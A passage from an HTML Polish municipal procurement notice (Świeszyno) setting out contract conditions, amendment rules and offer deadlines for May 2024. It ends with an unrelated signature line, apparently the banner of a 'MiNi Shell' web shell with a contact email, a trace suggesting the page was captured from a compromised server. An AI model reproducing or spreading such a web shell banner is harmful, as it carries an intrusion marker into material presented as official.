ust. 4 ustawy Pzp - pkt. 7.10) – jeżeli dotyczy,<br/>4) Zobowiązane podmiotu udostępniającego Wykonawcy swoje zasoby, o którym mowa w pkt. 3D rozdz. II SWZ, sporządzone na/wg Załącznika do SWZ nr 6 - jeżeli dotyczy,<br/>5) Jeżeli oferta nie zostanie podpisana przez Wykonawcę do oferty należy dołączyć PEŁNOMOCNICTWO(A) do działania w imieniu Wykonawcy (podpisanie oferty, reprezentowanie Wykonawcy, ewentualnie inne działania np. podpisanie umowy) - o ile umocowanie(a) osoby(ób) występującej(cych) w imieniu Wykonawcy nie wynikają z innych złożonych dokumentów,<br/>6) Dowód wniesienia wadium – jeżeli dotyczy, <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> Wykonawcy wspólnie ubiegający się o udzielenie zamówienia dołączają do oferty oświadczenie, z którego wynika, które roboty budowlane/dostawy/usługi wykonają poszczególni wykonawcy.<br/>Oświadczenia, o których mowa w pkt. 3.A1 SWZ , składa każdy z wykonawców. Oferta winna być podpisana przez każdego partnera lub upoważnionego przedstawiciela (partnera wiodącego lub wspólnika). Szczegółowe wymagania zawarto w pkt. 7 rozdz. II SWZ. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1. Zmiana postanowień zawartej umowy może nastąpić za zgodą obu Stron wyrażoną na piśmie w formie aneksu do umowy pod rygorem nieważności takiej zmiany.<br/>2. Na podstawie art. 455 ustawy Prawo zamówień publicznych, Zamawiający przewiduje możliwość dokonania istotnych zmian postanowień umowy zawartej z wybranym Wykonawcą w przypadkach określonych w paragrafie 13 projektowanych postanowień umowy.<br/>3. Przyczyny dokonania zmian postanowień umowy oraz uzasadnienie takich zmian należy opisać w stosownych dokumentach (notatka służbowa, pismo wykonawcy, protokół konieczności - protokół konieczności wymaga zatwierdzenia przez Zamawiającego).<br/>Szczegółowe zapisy zawarto w par. 13 PPU. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.6.) Zamawiający przewiduje następujące wymagania związane z realizacją zamówienia: </h3> <p class="mb-0">w zakresie zatrudnienia na podstawie stosunku pracy, w okolicznościach, o których mowa w art. 95 ustawy</p> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2024-05-29 11:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Ofertę należy złożyć za pośrednictwem platformy zakupowej dostępnej pod adresem internetowym https://platformazakupowa.pl/pn/swieszyno</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2024-05-29 11:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2024-06-27</span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com